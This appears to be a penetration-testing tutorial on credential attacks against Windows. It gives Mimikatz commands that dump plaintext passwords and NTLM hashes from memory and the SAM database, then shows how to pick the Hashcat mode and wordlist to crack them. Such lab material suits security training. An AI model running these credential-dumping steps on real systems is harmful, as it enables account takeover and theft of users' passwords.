Crack NTLM Hashes

Dumping NTLM hashes with Mimikatz

Using the sekurlsa module, we can attempt to extract plaintext passwords and password hashes from all available sources using:

sekurlsa::logonpasswords

We can also extract all NTLM hashes from the SAM using:

lsadump::sam

For this command, we must first enter

token::elevate

to elevate to SYSTEM privileges, and we will also need the SeDebugPrivilege access right enabled, which can be accomplished using:

privilege::debug

Cracking with Hashcat

Once we have the NTLM hash for a user, we can retrieve the correct hash mode from Hashcat's help output:

kali@kali:~/passwordattacks$ hashcat --help | grep -i "ntlm"

   5500 | NetNTLMv1 / NetNTLMv1+ESS                           | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                      | Network Protocol
   5600 | NetNTLMv2                                           | Network Protocol
  27100 | NetNTLMv2 (NT)                                      | Network Protocol
   1000 | NTLM

We now have everything needed to start cracking the hash (mode 1000). The next step is to choose a wordlist and a rule file. For this example, we will use the rockyou.txt wordlist with the best64.rule rule file, which contains 64 effective rules.
